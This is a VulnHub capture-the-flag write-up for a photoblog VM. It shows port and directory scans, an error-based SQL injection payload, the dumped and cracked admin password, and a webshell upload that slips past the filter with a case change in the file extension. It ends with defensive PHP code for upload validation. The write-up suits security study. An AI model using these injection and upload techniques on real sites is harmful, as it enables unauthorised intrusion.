vulnhub notes: from

    Tech  2024-07-13

    Information gathering

    Port scan

    # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport
    Nmap scan report for 192.168.111.141
    Host is up (0.00043s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
    | ssh-hostkey:
    |   1024 f8:4a:f0:61:f1:00:51:74:35:6b:2d:48:97:47:1c:84 (DSA)
    |_  2048 e3:91:77:99:64:b6:cd:45:71:d1:6c:55:42:c6:43:55 (RSA)
    80/tcp open  http    Apache httpd 2.2.16 ((Debian))
    |_http-server-header: Apache/2.2.16 (Debian)
    |_http-title: My Photoblog - last picture
    MAC Address: 00:0C:29:3C:74:CE (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Directory brute-forcing

    # dirb http://192.168.111.141

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Fri Jul  3 20:50:38 2020
    URL_BASE: http://192.168.111.141/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.111.141/ ----
    ==> DIRECTORY: http://192.168.111.141/admin/
    + http://192.168.111.141/all (CODE:200|SIZE:2022)
    + http://192.168.111.141/cat (CODE:200|SIZE:1858)
    + http://192.168.111.141/cgi-bin/ (CODE:403|SIZE:291)
    ==> DIRECTORY: http://192.168.111.141/classes/
    ==> DIRECTORY: http://192.168.111.141/css/
    + http://192.168.111.141/footer (CODE:200|SIZE:185)
    + http://192.168.111.141/header (CODE:200|SIZE:796)
    ==> DIRECTORY: http://192.168.111.141/images/
    + http://192.168.111.141/index (CODE:200|SIZE:1343)
    + http://192.168.111.141/index.php (CODE:200|SIZE:1343)
    + http://192.168.111.141/server-status (CODE:403|SIZE:296)
    + http://192.168.111.141/show (CODE:200|SIZE:1320)

    ---- Entering directory: http://192.168.111.141/admin/ ----
    + http://192.168.111.141/admin/del (CODE:302|SIZE:0)
    + http://192.168.111.141/admin/footer (CODE:200|SIZE:19)
    + http://192.168.111.141/admin/header (CODE:200|SIZE:686)
    + http://192.168.111.141/admin/index (CODE:302|SIZE:0)
    + http://192.168.111.141/admin/index.php (CODE:302|SIZE:0)
    + http://192.168.111.141/admin/login (CODE:200|SIZE:1387)
    + http://192.168.111.141/admin/logout (CODE:302|SIZE:0)
    + http://192.168.111.141/admin/new (CODE:302|SIZE:0)
    ==> DIRECTORY: http://192.168.111.141/admin/uploads/

    ---- Entering directory: http://192.168.111.141/classes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.111.141/css/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.111.141/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.111.141/admin/uploads/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    This reveals a directory listing issue: /classes/, /css/, /images/ and /admin/uploads/ are all listable.

    Front-end SQL injection

    Clicking around the site, an SQL injection is found; error-based injection works.

    Requesting /cat.php?id=1 AND (EXTRACTVALUE(1,CONCAT(0x7C,@@basedir,0x7C))) returns the error XPATH syntax error: '|/usr/|'

    UNION-based injection also works: the query has 4 columns, and the second one is reflected in the page. At this point sqlmap could do the whole job in one go, but injecting by hand is good practice for the commands.

    Obtaining the admin password

    Database: photoblog
    Table: users
    [1 entry]
    +----+-------+---------------------------------------------+
    | id | login | password                                    |
    +----+-------+---------------------------------------------+
    | 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
    +----+-------+---------------------------------------------+

    Back-end file upload

    After logging in to the admin panel, upload an image whose content is a PHP webshell, using Burp to change the extension to Php (case bypass of the extension filter). Connecting with AntSword then gives a shell.
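    To show why the Php rename gets through, here is an added example (not the photoblog's own code) of a case-sensitive extension blacklist of the kind this bypass defeats, beside a hardened check; the function names and the allowed-type lists are assumptions.

```php
<?php
// Added example, not code from the target application.

// Vulnerable: case-sensitive blacklist. "shell.Php" is not in the list,
// so it is accepted, yet Apache's handler mapping still executes it.
function upload_allowed_vulnerable(string $filename): bool {
    $ext = substr(strrchr($filename, '.'), 1);      // e.g. "Php"
    return !in_array($ext, ['php', 'php3', 'phtml'], true);
}

// Hardened: normalise case, allow-list image extensions only, and check
// the bytes look like an image instead of trusting the client's name.
function upload_allowed_hardened(string $filename, string $tmpPath): bool {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return false;                               // "Php", "PHP", "phtml" all rejected
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        return false;                               // PHP source saved as .jpg is rejected
    }
    return getimagesize($tmpPath) !== false;        // must parse as an image
}

// Store under a server-generated name so the client never controls the
// extension or path of what lands on disk.
function safe_destination(string $uploadDir, string $filename): string {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed check: the rename that works in the writeup passes the
// vulnerable function and fails the hardened one.
var_dump(upload_allowed_vulnerable('shell.Php'));   // bool(true)
var_dump(strtolower(pathinfo('shell.Php', PATHINFO_EXTENSION)) === 'php'); // bool(true)
```

    Content checks alone do not close the hole, since a valid image can still carry PHP in its body; the upload directory also needs script execution disabled (for mod_php on Apache, `php_admin_flag engine off` in that directory's configuration) and the listing shown by dirb turned off.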
